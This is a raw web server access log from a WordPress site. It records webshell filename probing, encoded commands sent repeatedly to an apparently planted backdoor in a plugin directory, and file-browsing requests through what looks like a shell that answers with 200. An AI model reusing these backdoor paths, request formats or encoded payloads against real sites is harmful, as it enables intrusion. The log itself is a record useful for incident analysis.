196.64.18.11 - - [13/Sep/2025:08:06:40 -0700] "GET /module.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:06:46 -0700] "GET /Init.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
173.236.205.121 - - [13/Sep/2025:08:06:47 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373737393534372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737353934372q3339393739393332663066313133376337346638346665623162373263656364222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:06:47 -0700] "GET /wp-includes/wp-class.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
91.137.27.140 - - [13/Sep/2025:08:06:47 -0700] "GET /?fileloc=/home/haitiopendh/haitiopendh/wp-includes/class-avif-info.php&path=/home/haitiopendh/haitiopendh/wp-includes HTTP/1.1" 200 10664 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
196.64.18.11 - - [13/Sep/2025:08:06:47 -0700] "GET /wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php HTTP/1.1" 500 5 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.137.27.140 - - [13/Sep/2025:08:06:47 -0700] "GET /?fileloc=/home/haitiopendh/haitiopendh/wp-includes/class-feed.php&path=/home/haitiopendh/haitiopendh/wp-includes HTTP/1.1" 200 3253 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
196.64.18.11 - - [13/Sep/2025:08:06:48 -0700] "GET /wp-includes/Requests/Proxy/ HTTP/1.1" 404 189 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:06:49 -0700] "GET /shx.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:06:52 -0700] "GET /kil.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:06:53 -0700] "GET /wp-includes/Requests/Response/ HTTP/1.1" 404 189 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:06:58 -0700] "GET /ovshell.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:01 -0700] "GET /wp-includes/Requests/Transport/ HTTP/1.1" 404 189 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:07:03 -0700] "GET /alfanibos.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:08 -0700] "GET /ms.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:10 -0700] "GET /wp-includes/Requests/Utility/ HTTP/1.1" 404 189 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:07:13 -0700] "GET /message.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:16 -0700] "GET /wp-mails.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:17 -0700] "GET /wp-includes/js/codemirror/ HTTP/1.1" 200 322 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:07:21 -0700] "GET /wikiindex.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:23 -0700] "GET /wp-includes/Requests/Exception/HTTP/ HTTP/1.1" 404 189 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:07:24 -0700] "GET /alex.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:29 -0700] "GET /shx.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:32 -0700] "GET /wp-includes/js/crop/ HTTP/1.1" 200 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:07:33 -0700] "GET /wp-0.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:39 -0700] "GET /wp-1.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:42 -0700] "GET /wp-includes/images/crystal/ HTTP/1.1" 200 350 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:07:45 -0700] "GET /xindex.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
173.236.205.121 - - [13/Sep/2025:08:07:46 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373737393630362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363030362q3633366566383235336537363931613536396636626637633838626431656566222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
91.137.27.140 - - [13/Sep/2025:08:07:46 -0700] "GET /?fileloc=/home/haitiopendh/haitiopendh/wp-includes/class-http.php&path=/home/haitiopendh/haitiopendh/wp-includes HTTP/1.1" 200 3223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
196.64.18.11 - - [13/Sep/2025:08:07:50 -0700] "GET /wiki-index.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:51 -0700] "GET /wp-includes/images/media/ HTTP/1.1" 200 464 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:07:53 -0700] "GET /Bulle.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:56 -0700] "GET /srx.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:07:58 -0700] "GET /wp-includes/images/smilies/ HTTP/1.1" 200 573 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:08:02 -0700] "GET /wp-content/plugins/owfsmac/mar.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:08:06 -0700] "GET /wp-includes/images/wlw/ HTTP/1.1" 404 189 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:08:06 -0700] "GET /wso.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
173.236.205.121 - - [13/Sep/2025:08:08:07 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373737393632372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363032372q3637366232616235656566363565323262386336376532343133353561626136222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:08:10 -0700] "GET /c99.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:08:12 -0700] "GET /wp-includes/rest-api/search/ HTTP/1.1" 200 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:08:15 -0700] "GET /tersembunyi.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:08:19 -0700] "GET /lab.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:08:25 -0700] "GET /plugins.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:08:31 -0700] "GET /1.aspx HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:08:35 -0700] "GET /shell.aspx HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:08:40 -0700] "GET /a.aspx HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:08:47 -0700] "GET /wp-raze.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:08:54 -0700] "GET /wp-init.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:09:02 -0700] "GET /lyda.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
173.236.205.121 - - [13/Sep/2025:08:09:06 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373737393638362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363038362q6437313164306137356462326239343137373961636565326564646435623765222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:09:06 -0700] "GET /wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php HTTP/1.1" 500 5 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:09:09 -0700] "GET /alfashell.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:09:13 -0700] "GET /av.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
93.158.90.71 - - [13/Sep/2025:08:09:15 -0700] "GET /robots.txt HTTP/1.1" 200 92 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1"
196.64.18.11 - - [13/Sep/2025:08:09:17 -0700] "GET /goods.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:09:23 -0700] "GET /upl.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
93.158.90.72 - - [13/Sep/2025:08:09:26 -0700] "GET / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1"
173.236.205.121 - - [13/Sep/2025:08:09:27 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373737393730372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363130372q6336363035333033393832623861383565363931373539303430646632366232222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:09:27 -0700] "GET /wp-includes/rest-api/search/class-wp-rest-post-search-handler.php HTTP/1.1" 500 5 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:09:27 -0700] "GET /wp-includes/rest-api/search/class-wp-rest-search-handler.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:09:34 -0700] "GET /login.phtml HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:09:38 -0700] "GET /fox.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:09:44 -0700] "GET /gelay.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:09:49 -0700] "GET /darkshell.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:09:54 -0700] "GET /gel4y.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:09:58 -0700] "GET /contacts.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:10:07 -0700] "GET /xmlrpc.php HTTP/1.1" 499 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
196.64.18.11 - - [13/Sep/2025:08:10:11 -0700] "GET /wp-includes/Requests/Exception/ HTTP/1.1" 404 189 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:10:21 -0700] "GET /wp-includes/Requests/Auth/ HTTP/1.1" 404 189 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:10:26 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373737393736362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363136362q6130336230323431366663363730363839343036356534306638336238373833222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:10:26 -0700] "GET /wp-includes/rest-api/search/class-wp-rest-term-search-handler.php HTTP/1.1" 500 5 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:10:30 -0700] "GET /wp-includes/sodium_compat/src/ HTTP/1.1" 200 324 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.20.105.74 - - [13/Sep/2025:08:10:38 -0700] "HEAD / HTTP/1.1" 499 0 "-" "DreamHost SiteMonitor 1.0"
173.236.205.121 - - [13/Sep/2025:08:10:47 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373737393738372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363138372q6530313964653362343036303464376366313864313933646236656533626533222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:10:47 -0700] "GET /wp-includes/sodium_compat/src/Compat.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:11:46 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373737393834362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363234362q3462633734386363313831353330336266303836336539626532373738633330222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
173.236.205.121 - - [13/Sep/2025:08:12:07 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373737393836372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363236372q6165346266326435313138336162353836323166616264366139303238323661222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:12:07 -0700] "GET /wp-includes/sodium_compat/src/Crypto.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:12:07 -0700] "GET /wp-includes/sodium_compat/src/Crypto32.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:12:45 -0700] "GET /wp-includes/sitemaps/providers/ HTTP/1.1" 200 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:12:51 -0700] "GET /wp-includes/Text/Diff/Engine/Engine/ HTTP/1.1" 404 189 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:13:00 -0700] "GET /wp-includes/customize/ HTTP/1.1" 200 883 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:13:06 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373737393932362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363332362q3261643936663732306633646635346566626534666438353930303833356264222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
66.249.72.38 - - [13/Sep/2025:08:13:06 -0700] "GET /?p=5518 HTTP/1.1" 200 36914 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
196.64.18.11 - - [13/Sep/2025:08:13:06 -0700] "GET /wp-includes/sodium_compat/src/SodiumException.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:13:06 -0700] "GET /wp-includes/fonts/ HTTP/1.1" 200 363 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:13:27 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373737393934372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363334372q6231366432653434316539373536383830323263353739643739356231633764222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:13:27 -0700] "GET /wp-includes/fonts/class-wp-font-collection.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.72.37 - - [13/Sep/2025:08:13:27 -0700] "GET /?p=4078 HTTP/1.1" 200 36908 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
35.211.166.124 - - [13/Sep/2025:08:13:43 -0700] "GET /ads.txt HTTP/1.1" 404 125 "-" "bidswitchbot/1.0"
